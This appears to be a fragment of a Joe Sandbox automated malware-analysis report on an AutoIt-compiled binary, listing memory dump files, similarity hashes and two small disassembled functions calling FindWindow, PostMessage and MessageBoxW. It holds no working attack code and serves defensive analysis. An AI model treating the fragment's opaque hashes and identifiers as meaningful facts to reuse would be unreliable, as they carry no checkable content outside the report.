                                                                                                                                                    • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: FindMessagePostSleepWindow
                                                                                                                                                    • String ID: Shell_TrayWnd
                                                                                                                                                    • API String ID: 529655941-2988720461
                                                                                                                                                    • Opcode ID: 2c92ce268d6dea70ed1d9c93ac972332f86dd545b3a9023bb22b3be85c6f7e29
                                                                                                                                                    • Instruction ID: e91d5bd0f3095d95abf168919443ed1e5ef8457e9bc9ee6dadeb2d3358a759b2
                                                                                                                                                    • Opcode Fuzzy Hash: 2c92ce268d6dea70ed1d9c93ac972332f86dd545b3a9023bb22b3be85c6f7e29
                                                                                                                                                    • Instruction Fuzzy Hash: 61D0A772B843017BFA6077745D0FF8B66145B14711F000C3A7B46A61C1D4F8D4018758
                                                                                                                                                    Function 004370C3 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 8windowCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 004370D1
                                                                                                                                                      • Part of subcall function 004118DA: _doexit.LIBCMT ref: 004118E6
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Message_doexit
                                                                                                                                                    • String ID: AutoIt$Error allocating memory.
                                                                                                                                                    • API String ID: 1993061046-4017498283
                                                                                                                                                    • Opcode ID: a805162a0f5c9c87f8277766c6d2ca4cce7c6123580b1b409358537ccd51af94
                                                                                                                                                    • Instruction ID: aa36ec6b1cc278624b5c670a1a0522bf80bf1016c56dd6686bcadf549e8ac499
                                                                                                                                                    • Opcode Fuzzy Hash: a805162a0f5c9c87f8277766c6d2ca4cce7c6123580b1b409358537ccd51af94
                                                                                                                                                    • Instruction Fuzzy Hash: F1B092323C030627E50437910D0BF9D26003B64F02F220C067324280D204C90090131D